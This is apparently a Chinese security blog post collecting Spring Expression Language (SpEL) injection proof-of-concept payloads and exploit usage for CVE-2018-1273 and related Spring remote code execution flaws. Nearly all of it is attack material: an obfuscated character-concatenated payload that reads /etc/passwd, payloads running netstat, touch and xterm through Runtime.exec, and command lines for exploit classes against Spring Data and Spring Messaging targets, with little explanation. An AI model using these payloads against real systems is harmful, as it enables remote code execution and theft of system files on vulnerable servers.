Spring SPEL注入漏洞利用

脉搏文库 0c0c0f
2018-06-16 7,608

SPEL注入POC:


命令回显poc:

T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())

${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27netstat%20-na%27).getInputStream())}

..

命令执行poc:

#{request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("touch/tmp/foobar")}

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf

..

 

近期pivotal官方的漏洞利用,如下:


漏洞编号: cve-2018-1273

漏洞环境:

/Users/***/soft/vulapp/spring-data-examples/web/projection/target

漏洞利用:

package com.evil.exp   SpringDataCommonsRCE

args -u http://127.0.0.1:8080/ -cmd ls


漏洞来源:

https://pivotal.io/security/cve-2018-1273

 

漏洞编号:cve-2018-1273

漏洞环境:

/Users/***/javaweb/spring-boot-2.0.0.M2/spring-boot-samples/spring-boot-sample-data-rest/target

漏洞利用:

package com.evil.exp   SpringDataRestRCE

args -u lshttp://127.0.0.1:8080/api/cities/1-cmd ls


 


漏洞编号:cve-2018-1273

漏洞环境:

/Users/***/javaweb/gs-messaging-stomp-websocket/complete/target

漏洞利用:

package com.evil.exp  SpringMessagingRCE

ws://127.0.0.1:8080/hello /topic/greetings /Applications/Calculator.app/Contents/MacOS/Calculator


参考:
https://github.com/genxor/CVE-2018-1270_EXP
https://www.exploit-db.com/exploits/44289/

 


本文作者:0c0c0f

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/72661.html

Tags:
点赞: 2 评论:1 收藏: 0
新浪微博 QQ空间 微信扫一扫
评论  (1)
快来写下你的想法吧!

0c0c0f
文章数:4 积分: 35

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge!——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会(Gdevops2020)

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31(周五线上)

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼